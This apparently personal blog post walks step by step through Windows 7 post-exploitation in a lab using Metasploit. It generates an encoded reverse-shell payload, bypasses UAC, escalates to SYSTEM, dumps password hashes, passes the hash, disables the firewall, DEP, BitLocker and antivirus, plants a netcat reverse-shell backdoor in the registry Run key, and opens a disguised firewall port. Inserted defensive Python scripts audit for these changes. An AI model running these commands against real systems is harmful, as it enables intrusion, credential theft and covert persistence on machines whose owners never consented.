Post-exploitation | Testing phase

Obtain a low-privilege session

Generate a payload with msf

  • msfvenom -p windows/meterpreter/reverse_tcp -a x86 --platform windows LHOST=192.168.171.129 LPORT=4444 -b "\x00" -e x86/shikata_ga_nai -i 7 -f exe -o lao.exe
    • -i: number of encoding iterations
    • -b: bad characters to exclude

Start apache to serve the generated lao.exe

  • service apache2 start
  • mv lao.exe /var/www/html/
  • download and save it on the Win7 VM

Set up the msf listener

  • use exploit/multi/handler
  • set payload windows/meterpreter/reverse_tcp
  • show options #nothing to set, everything is already configured
  • exploit

Run lao.exe on Win7

Get SYSTEM privileges

  • Running getsystem directly fails because of UAC
meterpreter > getuid
Server username: WIN-R3NAMN78L7D\Wind7
meterpreter > getsystem 
[-] priv_elevate_getsystem: Operation failed: The environment is incorrect. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)

Use the session already obtained to bypass the UAC restriction

  • The modules under local/ all take an existing session and escalate from it

Method with a prompt on Win7 (ask)

  • use exploit/windows/local/ask  #Win7 pops up a consent prompt whenever SYSTEM privileges are needed
  • set payload windows/meterpreter/reverse_tcp
  • set FILENAME win_update.exe #name of the executable that gets run
  • set SESSION 1
  • exploit
msf5 exploit(windows/local/ask) > show options 

Module options (exploit/windows/local/ask):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   FILENAME   win_update.exe   no        File name on disk
   PATH                        no        Location on disk, %TEMP% used if not set
   SESSION    1                yes       The session to run this module on.
   TECHNIQUE  EXE              yes       Technique to use (Accepted: PSH, EXE)


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.171.129  yes       The listen address (an interface may be specified)
   LPORT     8443             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows

  • The session obtained here has UAC bypassed, so getsystem works directly
msf5 exploit(windows/local/ask) > exploit 

[*] Started reverse TCP handler on 192.168.171.129:8443 
[*] UAC is Enabled, checking level...
[*] The user will be prompted, wait for them to click 'Ok'
[*] Uploading win_update.exe - 73802 bytes to the filesystem...
[*] Executing Command!
[*] Sending stage (176195 bytes) to 192.168.171.142
[*] Meterpreter session 2 opened (192.168.171.129:8443 -> 192.168.171.142:49163) at 2020-06-23 19:59:19 +0800

meterpreter > getuid
Server username: WIN-R3NAMN78L7D\Wind7
meterpreter > background 
[*] Backgrounding session 2...
msf5 exploit(windows/local/ask) > sessions 

Active sessions
===============

  Id  Name  Type                     Information                              Connection
  --  ----  ----                     -----------                              ----------
  1         meterpreter x86/windows  WIN-R3NAMN78L7D\Wind7 @ WIN-R3NAMN78L7D  192.168.171.129:4444 -> 192.168.171.142:49162 (192.168.171.142)
  2         meterpreter x86/windows  WIN-R3NAMN78L7D\Wind7 @ WIN-R3NAMN78L7D  192.168.171.129:8443 -> 192.168.171.142:49163 (192.168.171.142)

msf5 exploit(windows/local/ask) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > getsystem 
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > 

No prompt on Win7: executable method

  • use exploit/windows/local/bypassuac
  • set SESSION 1
  • set payload windows/meterpreter/reverse_tcp
  • exploit
  • Bypasses UAC directly; nothing appears on Win7
msf5 exploit(windows/local/bypassuac) > exploit 

[*] Started reverse TCP handler on 192.168.171.129:8443 
[*] UAC is Enabled, checking level...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[+] Part of Administrators group! Continuing...
[*] Uploaded the agent to the filesystem....
[*] Uploading the bypass UAC executable to the filesystem...
[*] Meterpreter stager executable 73802 bytes long being uploaded..
[*] Sending stage (176195 bytes) to 192.168.171.142
[*] Meterpreter session 3 opened (192.168.171.129:8443 -> 192.168.171.142:49164) at 2020-06-23 20:09:03 +0800

meterpreter > getuid
Server username: WIN-R3NAMN78L7D\Wind7
meterpreter > getsystem 
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > 

No prompt on Win7: DLL injection

  • use exploit/windows/local/bypassuac_injection
  • set SESSION 1
  • set payload windows/meterpreter/reverse_tcp
  • set target 1
  • exploit

Privilege escalation via vulnerabilities

Applies to: Windows 7 32-bit SP0/SP1

  • use exploit/windows/local/ms13_053_schlamperei
  • set payload windows/meterpreter/reverse_tcp
  • set session 1
  • exploit
  • You get SYSTEM privileges directly

Applies to: Windows 7 32-bit SP0/SP1

  • use exploit/windows/local/ms13_081_track_popup_menu 
  • set payload windows/meterpreter/reverse_tcp
  • set session 1
  • exploit

Applies to: IE 8 - 11

  • use exploit/windows/local/ms13_097_ie_registry_symlink
  • set payload windows/meterpreter/reverse_tcp
  • set session 1
  • exploit

Applies to: Windows XP SP3, Windows 2003 SP1, and Windows 7 32-bit SP1

  • use exploit/windows/local/ppr_flatten_rec
  • set payload windows/meterpreter/reverse_tcp
  • set session 1
  • exploit

Graphical payload: vncinject

  • use exploit/windows/local/bypassuac
  • set payload windows/vncinject/reverse_tcp
  • show options
  • exploit
msf5 exploit(windows/local/bypassuac) > exploit 

[*] Started reverse TCP handler on 192.168.171.129:8443 
[*] UAC is Enabled, checking level...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[+] Part of Administrators group! Continuing...
[*] Uploaded the agent to the filesystem....
[*] Uploading the bypass UAC executable to the filesystem...
[*] Meterpreter stager executable 73802 bytes long being uploaded..
[*] Sending stage (401920 bytes) to 192.168.171.142
[*] Starting local TCP relay on 127.0.0.1:5900...
[*] Local TCP relay started.
[*] Launched vncviewer.
[*] Session 4 created in the background.
msf5 exploit(windows/local/bypassuac) > Connected to RFB server, using protocol version 3.8
Enabling TightVNC protocol extensions
No authentication needed
Authentication successful
Desktop name "win-r3namn78l7d"
VNC server default format:
  32 bits per pixel.
  Least significant byte first in each pixel.
  True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Using default colormap which is TrueColor.  Pixel format:
  32 bits per pixel.
  Least significant byte first in each pixel.
  True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Same machine: preferring raw encoding
msf5 exploit(windows/local/bypassuac) > 

  • View-only by default; to allow input: set ViewOnly no

hashdump

Dump every entry as username:SID:password hashes

  • sessions -i 2 #switch into a session that has SYSTEM privileges
  • ps
  • migrate 1272 # at SYSTEM level the service needs a 64-bit process to run, so migrate into a 64-bit process
  • hashdump
 1272  496   spoolsv.exe        x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\spoolsv.exe
 1296  496   taskhost.exe       x64   1        WIN-R3NAMN78L7D\Wind7         C:\Windows\System32\taskhost.exe
 1348  496   svchost.exe        x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 1380  496   dllhost.exe        x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\dllhost.exe
 1440  2544  exyFQx.exe         x86   1        WIN-R3NAMN78L7D\Wind7         C:\Users\Wind7\AppData\Local\Temp\exyFQx.exe
 1548  496   VGAuthService.exe  x64   0        NT AUTHORITY\SYSTEM           C:\Program Files\VMware\VMware Tools\VMware VGAuth\VGAuthService.exe
 1584  496   vmtoolsd.exe       x64   0        NT AUTHORITY\SYSTEM           C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
 1840  496   svchost.exe        x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 2044  616   WmiPrvSE.exe       x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\wbem\WmiPrvSE.exe
 2184  496   SearchIndexer.exe  x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\SearchIndexer.exe
 2660  1080  lao.exe            x86   1        WIN-R3NAMN78L7D\Wind7         C:\Users\Wind7\Desktop\lao.exe
 2848  1688  iYUZWP.exe         x86   1        WIN-R3NAMN78L7D\Wind7         C:\Users\Wind7\AppData\Local\Temp\iYUZWP.exe
 2860  1080  lao.exe            x86   1        WIN-R3NAMN78L7D\Wind7         C:\Users\Wind7\Desktop\lao.exe
 2960  496   svchost.exe        x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 2992  496   sppsvc.exe         x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\sppsvc.exe
 3032  496   svchost.exe        x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe

meterpreter > migrate 1272 
[*] Migrating from 2848 to 1272...
[*] Migration completed successfully.
meterpreter > hashdump 
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Wind7:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
meterpreter > 
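
All three hashes above are the well-known empty-password hashes: aad3b435b51404eeaad3b435b51404ee is the LM hash of an empty string (it is also what hashdump shows when no LM hash is stored at all) and 31d6cfe0d16ae931b73c59d7e0c089c0 is the NT hash of an empty string, so every dumped account has a blank password. Windows by default restricts blank-password local accounts to console logon, a policy worth leaving in place. As an added example that is not part of the original post, the Python code below parses hashdump lines and flags blank passwords and accounts that still carry a stored LM hash; the first three sample lines are copied from the output above, the fourth is a constructed placeholder with made-up hex values.

```python
"""Triage meterpreter hashdump output from a defender's point of view (added example)."""

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM hash of "" / marker for "no LM hash stored"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of ""

# Three lines copied from the post's hashdump output plus one constructed line
# (placeholder hashes, not real credential material) to exercise the LM check.
SAMPLE_HASHDUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Wind7:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
legacyuser:1001:00112233445566778899aabbccddeeff:ffeeddccbbaa99887766554433221100:::
"""


def parse_hashdump(text):
    """Return a list of (user, rid, lm_hash, nt_hash); blank or malformed lines are skipped."""
    rows = []
    for line in text.splitlines():
        parts = line.strip().split(":")
        if len(parts) < 4 or not parts[1].isdigit():
            continue
        rows.append((parts[0], int(parts[1]), parts[2].lower(), parts[3].lower()))
    return rows


def triage(rows):
    """Map user -> list of findings; accounts with nothing to report are omitted."""
    findings = {}
    for user, rid, lm, nt in rows:
        notes = []
        if nt == EMPTY_NT:
            # Blank password: only console logon is allowed by default, but any
            # local session (or a UAC bypass, as above) can use the account freely.
            notes.append("empty password")
        if lm != EMPTY_LM:
            # A real LM hash means the NoLMHash policy was not in force when the
            # password was set; LM hashes are trivially crackable.
            notes.append("LM hash stored (NoLMHash not enforced)")
        if notes:
            findings[user] = notes
    return findings


if __name__ == "__main__":
    for user, notes in triage(parse_hashdump(SAMPLE_HASHDUMP)).items():
        print(f"{user}: {', '.join(notes)}")
```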

Disable UAC

Bypassing UAC only takes effect in the current session

  • cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
  • cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f
  • shutdown /r /t 0
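
The two reg ADD commands above change exactly the values a defender should watch: EnableLUA=0 switches UAC off after the next reboot, and LocalAccountTokenFilterPolicy=1 turns off UAC remote restrictions, so every member of the local Administrators group receives a full token over the network (this is what makes pass-the-hash with a local account work). The following is an added example, not part of the original post: Python code that parses the output of `reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System` and reports any value that differs from the Windows 7 defaults. The sample text inside is constructed, not captured from the post's VM.

```python
"""Audit UAC-related policy values parsed from `reg query` output (added example)."""
import re

# Constructed sample imitating `reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System`
# on a Windows 7 host after the two `reg ADD` commands above have been run.
SAMPLE_REG_QUERY = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
    ConsentPromptBehaviorAdmin    REG_DWORD    0x5
    ConsentPromptBehaviorUser    REG_DWORD    0x3
    EnableLUA    REG_DWORD    0x0
    PromptOnSecureDesktop    REG_DWORD    0x1
    LocalAccountTokenFilterPolicy    REG_DWORD    0x1
"""

# Windows 7 defaults for a standalone host. LocalAccountTokenFilterPolicy is
# normally absent, which Windows treats as 0 (remote token filtering on).
EXPECTED = {
    "EnableLUA": 1,                      # UAC enabled
    "ConsentPromptBehaviorAdmin": 5,     # prompt for consent for non-Windows binaries
    "PromptOnSecureDesktop": 1,          # prompt on the secure desktop
    "LocalAccountTokenFilterPolicy": 0,  # remote restrictions for local admins on
}
ABSENT_MEANS_ZERO = {"LocalAccountTokenFilterPolicy"}

VALUE_RE = re.compile(r"^\s*(\S+)\s+REG_DWORD\s+0x([0-9a-fA-F]+)\s*$")


def parse_dwords(text):
    """Return {value_name: int} for every REG_DWORD line in reg query output."""
    values = {}
    for line in text.splitlines():
        m = VALUE_RE.match(line)
        if m:
            values[m.group(1)] = int(m.group(2), 16)
    return values


def audit_uac(values):
    """Compare parsed values with EXPECTED; an empty list means no deviation found."""
    findings = []
    for name, want in EXPECTED.items():
        got = values.get(name, 0 if name in ABSENT_MEANS_ZERO else None)
        if got is None:
            findings.append(f"{name}: not present (cannot verify)")
        elif got != want:
            findings.append(f"{name}: {got} (expected {want})")
    return findings


if __name__ == "__main__":
    for finding in audit_uac(parse_dwords(SAMPLE_REG_QUERY)):
        print(finding)
```

On a live host the same parser can be fed the real `reg query` output; a change in either EnableLUA or LocalAccountTokenFilterPolicy between two runs is a strong signal that someone has been preparing the box for remote administrative access.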

Psexec module: pass the hash

Firewall off + UAC off; I don't know why it failed here: 192.168.171.142:445 - Exploit failed: RubySMB::Error::UnexpectedStatusCode STATUS_USER_SESSION_DELETED

  • use exploit/windows/smb/psexec
  • set RHOSTS 192.168.171.142    #the machine that speaks SMB
  • set SMBUser Wind7                    #account used for the remote call
  • set SMBPass aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0     #the password hash
  • set payload windows/meterpreter/reverse_tcp
  • show options
  • exploit

Things you can do with SYSTEM privileges

Disable the Windows firewall

  • sessions -i 4
  • shell
  • netsh advfirewall set allprofiles state off

Stop the built-in Defender service (from the cmd shell, C:\Windows\system32>)

  • Defender is not installed on this machine, so Windows Audio is used for the demo; the argument is the service name, not the display name
  • net stop AudioSrv

Turn off disk encryption (C:\Windows\system32>)

  • manage-bde -off c:
  • manage-bde -status C:

Disable DEP (C:\Windows\system32>)

  • bcdedit.exe /set {current} nx AlwaysOff
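
Each command in this section switches off a host protection, and each leaves a state that can be checked afterwards. The Python code below is an added example, not from the post: it parses constructed samples of the output of `netsh advfirewall show allprofiles`, `bcdedit /enum {current}` and `manage-bde -status C:` and reports any drift from the expected settings (firewall on for all three profiles, DEP policy OptIn/OptOut/AlwaysOn, BitLocker protection on). The sample texts are shaped like the real command output but are not captured from the post's VM.

```python
"""Report drift of firewall, DEP and BitLocker state from expected values (added example)."""
import re

# Constructed sample of `netsh advfirewall show allprofiles` after `set allprofiles state off`.
SAMPLE_NETSH = """\
Domain Profile Settings:
----------------------------------------------------------------------
State                                 OFF
Firewall Policy                       BlockInbound,AllowOutbound

Private Profile Settings:
----------------------------------------------------------------------
State                                 OFF
Firewall Policy                       BlockInbound,AllowOutbound

Public Profile Settings:
----------------------------------------------------------------------
State                                 OFF
Firewall Policy                       BlockInbound,AllowOutbound
"""

# Constructed sample of `bcdedit /enum {current}` after `nx AlwaysOff` was set.
SAMPLE_BCDEDIT = """\
Windows Boot Loader
-------------------
identifier              {current}
device                  partition=C:
path                    \\Windows\\system32\\winload.exe
description             Windows 7
nx                      AlwaysOff
"""

# Constructed sample of `manage-bde -status C:` after `manage-bde -off c:` finished.
SAMPLE_BDE = """\
Volume C: []
[OS Volume]

    Conversion Status:    Fully Decrypted
    Percentage Encrypted: 0%
    Protection Status:    Protection Off
"""


def firewall_states(text):
    """Return {profile: 'ON'|'OFF'} from netsh advfirewall show allprofiles output."""
    states, profile = {}, None
    for line in text.splitlines():
        m = re.match(r"^(\w+) Profile Settings:", line)
        if m:
            profile = m.group(1)
            continue
        m = re.match(r"^State\s+(ON|OFF)\s*$", line)
        if m and profile:
            states[profile] = m.group(1)
    return states


def dep_policy(text):
    """Return the nx value (OptIn, OptOut, AlwaysOn, AlwaysOff) or None if absent."""
    m = re.search(r"^nx\s+(\S+)", text, re.MULTILINE)
    return m.group(1) if m else None


def bitlocker_protection(text):
    """Return 'On' or 'Off' from manage-bde -status output, or None if absent."""
    m = re.search(r"Protection Status:\s+Protection (On|Off)", text)
    return m.group(1) if m else None


def drift_report(netsh_out, bcdedit_out, bde_out):
    """List every protection that is not in its expected state; empty list means clean."""
    findings = []
    for profile, state in firewall_states(netsh_out).items():
        if state != "ON":
            findings.append(f"firewall {profile} profile is {state}")
    nx = dep_policy(bcdedit_out)
    if nx not in ("OptIn", "OptOut", "AlwaysOn"):
        findings.append(f"DEP policy is {nx}")
    if bitlocker_protection(bde_out) != "On":
        findings.append("BitLocker protection is off on C:")
    return findings


if __name__ == "__main__":
    for finding in drift_report(SAMPLE_NETSH, SAMPLE_BCDEDIT, SAMPLE_BDE):
        print(finding)
```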

Kill antivirus software

  • run killav
C:\Windows\system32>exit
exit
meterpreter > run killav

[!] Meterpreter scripts are deprecated. Try post/windows/manage/killav.
[!] Example: run post/windows/manage/killav OPTION=value [...]
[*] Killing Antivirus services on the target...
meterpreter > 
  • run post/windows/manage/killav
meterpreter > run post/windows/manage/killav

[*] No target processes were found.
meterpreter >

Remote desktop: did not succeed

  • run post/windows/manage/enable_rdp #enable
  • run multi_console_command -rc /root/.msf4/loot/20200625084435_default_192.168.171.142_host.windows.cle_701238.txt  #disable
  • run getgui -e   #enable
  • run getgui -u lao -p lao  #add a user to the Remote Desktop Users group

View the remote desktop

  • screenshot
meterpreter > screenshot
Screenshot saved to: /root/OFMCLZEC.jpeg
meterpreter > 
  • use espia
  • screengrab 
meterpreter > use espia 
Loading extension espia...Success.
meterpreter > screengrab 
Screenshot saved to: /root/OhpONTdG.jpeg
meterpreter > 

Incognito

  • list_tokens -u
  • impersonate_token lab\\administrator
  • The commands above require getsystem first
  • A local low-privilege user must escalate locally first
    • use exploit/windows/local/ms10_015_kitrap0d
    • execute -f cmd.exe -i -t # -t: run the program with the currently impersonated token
    • shell

Registry

  • The registry holds almost all of Windows' configuration parameters
    • An incorrect change can crash the system outright
    • Back up the registry completely before modifying it
    • Some registry changes are irreversible
  • Common uses
    • Modify or add startup entries: the Windows activation key is stored in the registry
    • Steal secrets stored in the registry: credentials remembered by the browser are kept in the registry
    • Evade file-based antivirus: the payload is kept in the registry, auto-starts with the system and runs in memory without being written back to disk

Add an nc backdoor via the registry

  • Prerequisite: you already have a meterpreter shell
  • upload /usr/share/windows-binaries/nc.exe C:\\windows\\system32    #if the upload fails, you need to escalate privileges first
meterpreter > upload /usr/share/windows-binaries/nc.exe C:\\windows\\system32
[*] uploading  : /usr/share/windows-binaries/nc.exe -> C:\windows\system32
[*] uploaded   : /usr/share/windows-binaries/nc.exe -> C:\windows\system32\nc.exe
meterpreter > 
  • reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run      #enumerate the startup entries; if nothing is listed, check again after escalating
msf5 exploit(windows/local/bypassuac) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > gets
getsid     getsystem  
meterpreter > getsystem 
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run
Enumerating: HKLM\software\microsoft\windows\currentversion\run

  Values (3):

    VMware VM3DService Process
    VMware User Process
    nc64

meterpreter > 
  • reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d 'C:\windows\system32\nc.exe -Ldp 444 -e cmd.exe'
    • -d : detach from console, stealth mode
    • -L  : listen harder, re-listen on socket close
    • -p port :local port number
    • Verify: Win+R, type regedit to open the Registry Editor. Path: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

  • reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\Run -v nc
meterpreter > reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\Run -v nc
Key: HKLM\software\microsoft\windows\currentversion\Run
Name: nc
Type: REG_SZ
Data: C:\windows\system32\nc.exe -Ldp 444 -e cmd.exe
meterpreter > 
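
A Run-key value like the one set above is exactly what autorun monitoring should catch. As an added example that is not part of the original post, the Python code below parses the output of `reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run` and flags entries that launch a netcat binary, hand a shell to -e, or run from a user-writable directory. The sample text is constructed: the two VMware command lines and the "updater" entry are made up for the example, and the nc entry mirrors the value written above.

```python
"""Flag suspicious autorun entries in `reg query ...\\Run` output (added example)."""
import re

# Constructed sample; the nc line matches the value set with `reg setval` above.
SAMPLE_RUN_KEY = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    VMware VM3DService Process    REG_SZ    "C:\Windows\system32\vm3dservice.exe" -u
    VMware User Process    REG_SZ    "C:\Program Files\VMware\VMware Tools\vmtoolsd.exe" -n vmusr
    nc    REG_SZ    C:\windows\system32\nc.exe -Ldp 444 -e cmd.exe
    updater    REG_SZ    C:\Users\Wind7\AppData\Local\Temp\exyFQx.exe
"""

VALUE_RE = re.compile(r"^\s*(.+?)\s+REG_(?:EXPAND_)?SZ\s+(.*\S)\s*$")
NETCAT = {"nc.exe", "nc64.exe", "ncat.exe", "netcat.exe"}
SHELLS = {"cmd.exe", "cmd", "powershell.exe", "powershell"}
USER_WRITABLE = re.compile(r"\\(Temp|AppData|Users|ProgramData|Public)\\", re.IGNORECASE)


def parse_run_key(text):
    """Return {value_name: command_line} for every REG_SZ / REG_EXPAND_SZ line."""
    entries = {}
    for line in text.splitlines():
        m = VALUE_RE.match(line)
        if m:
            entries[m.group(1)] = m.group(2)
    return entries


def split_cmdline(cmdline):
    """Minimal Windows-style tokenizer: a quoted path is one token, otherwise split on spaces."""
    return re.findall(r'"[^"]*"|\S+', cmdline)


def assess(cmdline):
    """Return the list of reasons an autorun command line looks suspicious (empty == benign)."""
    tokens = split_cmdline(cmdline)
    if not tokens:
        return []
    exe = tokens[0].strip('"')
    exe_name = exe.rsplit("\\", 1)[-1].lower()
    flags = [t for t in tokens[1:] if t.startswith("-")]
    reasons = []
    if exe_name in NETCAT:
        reasons.append("netcat binary in autorun")
        # -l / -L (possibly combined, e.g. -Ldp) means it waits for inbound connections
        if any("l" in f.lower() for f in flags):
            reasons.append("listens for inbound connections")
    # "-e cmd.exe" (or -c) hands an interactive shell to whoever connects
    for i, t in enumerate(tokens[1:-1], start=1):
        nxt = tokens[i + 1].strip('"').rsplit("\\", 1)[-1].lower()
        if t.lower() in ("-e", "-c") and nxt in SHELLS:
            reasons.append("spawns a shell for the connecting party")
            break
    if USER_WRITABLE.search(exe):
        reasons.append("runs from a user-writable directory")
    return reasons


def audit_run_key(text):
    """Map value name -> reasons for every entry that has at least one finding."""
    report = {}
    for name, cmdline in parse_run_key(text).items():
        reasons = assess(cmdline)
        if reasons:
            report[name] = reasons
    return report


if __name__ == "__main__":
    for name, reasons in audit_run_key(SAMPLE_RUN_KEY).items():
        print(f"{name}: {', '.join(reasons)}")
```

The same assessment applies to HKCU\...\Run and the RunOnce keys; a real deployment would compare the parsed entries against a known-good baseline rather than rely on name heuristics alone.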

Check a specific port from cmd

  • netstat -nao | find "444"
C:\Users\Wind7>netstat -nao | find "444"
  TCP    192.168.171.146:49177  192.168.171.129:4444   ESTABLISHED     1448
  TCP    192.168.171.146:49178  192.168.171.129:4444   ESTABLISHED     760

C:\Users\Wind7>

Open a port in the firewall

  • execute -f cmd -i -H
    • -i: interact with the command prompt
    • -H: hidden (no window)
  • netsh firewall show opmode   #show the current firewall state
  • netsh firewall add portopening TCP 444 "QQ" ENABLE ALL
  • shutdown -r -t 0
  • nc 1.1.1.1 444

Posted 2020-06-23 19:41 by 东坡肉肉君